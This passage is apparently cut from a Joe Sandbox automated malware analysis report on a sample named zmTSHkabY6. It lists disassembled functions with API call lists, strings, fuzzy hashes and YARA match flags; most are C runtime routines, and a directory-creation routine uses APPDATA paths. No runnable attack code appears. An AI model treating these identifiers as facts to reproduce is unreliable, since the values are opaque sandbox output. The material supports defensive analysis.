                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                                                    • Instruction ID: 77e6785c828baecb52582d09b1b14edac196714ae9321c17d64660e5f0acdfa7
                                                                    • Opcode Fuzzy Hash: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                                                    • Instruction Fuzzy Hash: DB320531E69F414DD7239634D822336A288AFB73D5F55D737E826B5EA6EB28C4C34108
                                                                    Function 00844400 Relevance: .2, Instructions: 179COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 785aa5f7bd89d43373c67abcccc6bd0ca1e67064ef5bd75b52faf7b9ae67f377
                                                                    • Instruction ID: 79b93ca4e33cf261de9842ec79ee2ce3fedbdd663315f56b076c97fc97338fd7
                                                                    • Opcode Fuzzy Hash: 785aa5f7bd89d43373c67abcccc6bd0ca1e67064ef5bd75b52faf7b9ae67f377
                                                                    • Instruction Fuzzy Hash: 8D516AF3E042244BE704693CDD5877AB695DB58310F1B463CDE89E7B84E87B9D0586C2
                                                                    Function 0081C9F3 Relevance: .1, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 803aec6336ecb1bee3b849faf1981459924ad18891fd1c3a93bf1b3b4b5156d0
                                                                    • Instruction ID: e0406e90464e6ee175ecb3cba821fa3f6ab9529fd2cea4b357fdb86e798a3973
                                                                    • Opcode Fuzzy Hash: 803aec6336ecb1bee3b849faf1981459924ad18891fd1c3a93bf1b3b4b5156d0
                                                                    • Instruction Fuzzy Hash: 4E31C0B288831E8FDB55CF64C2411EE77A4FF8A334F244029D846DBA02D2726C66DF49
                                                                    Function 00E9A779 Relevance: .1, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                                    • Instruction ID: ff89ea477c949eea0660dce8356e6b33811a7b0bf9dbf31960d836e20e548d33
                                                                    • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                                    • Instruction Fuzzy Hash: 9521B373F205394B7B0CC57E8C562BDB6E1C78C601745823AE8A6EA2C1D96CD917E2E4
                                                                    Function 0041A512 Relevance: .1, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                                    • Instruction ID: 1ad9d6d7365e600a7bb69782b0834f4d420f3f91d9e0c3ac1aa475b9fcfe298e
                                                                    • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                                    • Instruction Fuzzy Hash: 6521B673F2043947770CC57ECC522BDB6E1C78C501745423AE8A6EA2C1D96CD917E2E4
                                                                    Function 00E9A659 Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                                    • Instruction ID: e0002f80c5770fe19e6f1d5788cbf73fbf56f532de9f6c1ba9693e850b4df916
                                                                    • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                                    • Instruction Fuzzy Hash: 99118663F30C255B675C816D8C172BAA5D2EBDC25074F533AD826E7384E9A4DE23D290
                                                                    Function 0041A3F2 Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                                    • Instruction ID: f1e66852e6b8581706c01849561528f719d4aeccf6fe4fc0aff0fb2656777429
                                                                    • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                                                    • Instruction Fuzzy Hash: D6118A73F30C255B675C816D8C172BAA5D2EBDC25074F533AD826E7284E998DE23D290
                                                                    Function 00E8ABC7 Relevance: .1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction ID: 1e454456d46afa4b78172a060a6d3e9afebdc84f0249368066f99fc11d60397c
                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction Fuzzy Hash: D311577720004147FA14EA7DD5B42BAE396EBC6328B2C767BD04E6B348D222ED449702
                                                                    Function 0040A960 Relevance: .1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction ID: bf3d62387290270b8e9c206f9b330aa6ec5fad9da35dacc9460757c01b80fc97
                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction Fuzzy Hash: 43115EF730038143D704862EC5B45B7E395EBC6321B2F4B7BC0825B7C8C23A9865E50A
                                                                    Function 100102A0 Relevance: .1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                    • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                                                    Function 00D99C83 Relevance: .1, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220928056.0000000000D99000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D99000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d99000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                    • Instruction ID: dc6b87ce58b20cb33b0593cbf4f383ff20eb63e77c8acf69c45932d60aecd79a
                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                    • Instruction Fuzzy Hash: 79115E72340100AFDB54DF59DCD1EA6B3EAEB89320B298169ED04CB316E675EC41C770
                                                                    Function 00E80D90 Relevance: .0, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                    • Instruction ID: 4b774c0f43436876bdca649e67839ea7ebc3faf03d69ce9f04b8d53551ad7d40
                                                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                    • Instruction Fuzzy Hash: 8601F272A006008FDF61EF60C805BAB33E5FB8630AF0544A4D90EA7281E370A9498B80
                                                                    Function 00E938D6 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                                    • Instruction ID: d7f8151201f1939aecba355e2b9a815538efd851797e54eadf98ec4ebdf1dd9c
                                                                    • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                                    • Instruction Fuzzy Hash: 94E08C72921228EBCB24DB98C905D8AF7FCEB44B40B114096F901E3240C270DF40C7D0
                                                                    Function 0041366F Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                                    • Instruction ID: fd5c11342e53f5fd9e78528a8d63764efe72d1229905d7d1658511e5362cd08d
                                                                    • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                                    • Instruction Fuzzy Hash: EEE04632911228EBCB24DF898A08A8AF3ACEB44B09B11049AB501D3210C274DE80C7D4
                                                                    Function 10007A76 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                                    • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                                                    • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                                    • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                                                    Function 00409088 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,00409066), ref: 00409094
                                                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409066), ref: 0040909F
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409066), ref: 004090B0
                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004090C2
                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004090D0
                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409066), ref: 004090F3
                                                                    • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 0040910F
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00409066), ref: 0040911F
                                                                    Strings
                                                                    • SleepConditionVariableCS, xrefs: 004090BC
                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040909A
                                                                    • kernel32.dll, xrefs: 004090AB
                                                                    • WakeAllConditionVariable, xrefs: 004090C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                    • API String ID: 2565136772-3242537097
                                                                    • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                                    • Instruction ID: acc3deda13f420712ce33b53dd37b90dad73ad81c8ab949137041f64949c0d3f
                                                                    • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                                    • Instruction Fuzzy Hash: 410196B1F40322ABE7202B75AD0DB963B989B4CB01B154036FD15E2295D77CCC01866D
                                                                    Function 00E9744A Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 00E9748E
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E97167
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E97179
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E9718B
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E9719D
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E971AF
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E971C1
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E971D3
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E971E5
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E971F7
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E97209
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E9721B
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E9722D
                                                                      • Part of subcall function 00E9714A: _free.LIBCMT ref: 00E9723F
                                                                    • _free.LIBCMT ref: 00E97483
                                                                      • Part of subcall function 00E91D29: HeapFree.KERNEL32(00000000,00000000,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?), ref: 00E91D3F
                                                                      • Part of subcall function 00E91D29: GetLastError.KERNEL32(?,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?,?), ref: 00E91D51
                                                                    • _free.LIBCMT ref: 00E974A5
                                                                    • _free.LIBCMT ref: 00E974BA
                                                                    • _free.LIBCMT ref: 00E974C5
                                                                    • _free.LIBCMT ref: 00E974E7
                                                                    • _free.LIBCMT ref: 00E974FA
                                                                    • _free.LIBCMT ref: 00E97508
                                                                    • _free.LIBCMT ref: 00E97513
                                                                    • _free.LIBCMT ref: 00E9754B
                                                                    • _free.LIBCMT ref: 00E97552
                                                                    • _free.LIBCMT ref: 00E9756F
                                                                    • _free.LIBCMT ref: 00E97587
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    • Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                                    • Instruction ID: 051abfddf4dc9b30d2043e023e19248aa332f2973cb068275150e14eb37d8927
                                                                    • Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                                    • Instruction Fuzzy Hash: 2731A0716183069FEF25AA38D845B5A77E8EF00315F156859F4A8F7192DF34EC84C721
                                                                    Function 004171E3 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 00417227
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F00
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F12
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F24
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F36
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F48
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F5A
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F6C
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F7E
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F90
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FA2
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FB4
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FC6
                                                                      • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FD8
                                                                    • _free.LIBCMT ref: 0041721C
                                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                    • _free.LIBCMT ref: 0041723E
                                                                    • _free.LIBCMT ref: 00417253
                                                                    • _free.LIBCMT ref: 0041725E
                                                                    • _free.LIBCMT ref: 00417280
                                                                    • _free.LIBCMT ref: 00417293
                                                                    • _free.LIBCMT ref: 004172A1
                                                                    • _free.LIBCMT ref: 004172AC
                                                                    • _free.LIBCMT ref: 004172E4
                                                                    • _free.LIBCMT ref: 004172EB
                                                                    • _free.LIBCMT ref: 00417308
                                                                    • _free.LIBCMT ref: 00417320
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    • Opcode ID: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
                                                                    • Instruction ID: edf7faae9d3bf0885fb7c5c7e3fb72ef0fb286978f56b7ec46c8a8d77fdb3eda
                                                                    • Opcode Fuzzy Hash: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
                                                                    • Instruction Fuzzy Hash: A1313D31608204ABEB21AB7AD845BD777F4AF41354F24885BF559D7261EE38ECC1C628
                                                                    Function 00E8B342 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 00E8B43F
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00E8B461
                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00E8B570
                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 00E8B642
                                                                    • _UnwindNestedFrames.LIBCMT ref: 00E8B6C6
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00E8B6E1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 2123188842-393685449
                                                                    • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                                    • Instruction ID: 24b3bb430d63e0246de5d8e1c708c9e2d6904e9e8d2fbb60fb12321c9d7efde1
                                                                    • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                                    • Instruction Fuzzy Hash: B1B14B71900209EFCF25EFA4C8819AEB7B5FF04318B14616AE81D7B252E731EA51DF91
                                                                    Function 0040B0DB Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B1D8
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 0040B1FA
                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 0040B309
                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B3DB
                                                                    • _UnwindNestedFrames.LIBCMT ref: 0040B45F
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 0040B47A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 2123188842-393685449
                                                                    • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                                    • Instruction ID: 3d06a1d46c9e927f581abf88e740a03f69e3fad8364d4cdf02b7d05f470413ac
                                                                    • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                                    • Instruction Fuzzy Hash: DAB15471800209EFCF29DFA5C8819AEB7B5FF14314B14456BE8117B692D338DA61CBDA
                                                                    Function 10001CDD Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 156COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                                                    • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                                                    • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                                                    • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                                                    • String ID: APPDATA$TMPDIR
                                                                    • API String ID: 1838500112-4048745339
                                                                    • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                                    • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                                                    • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                                    • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                                                    Function 100010C7 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 55networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
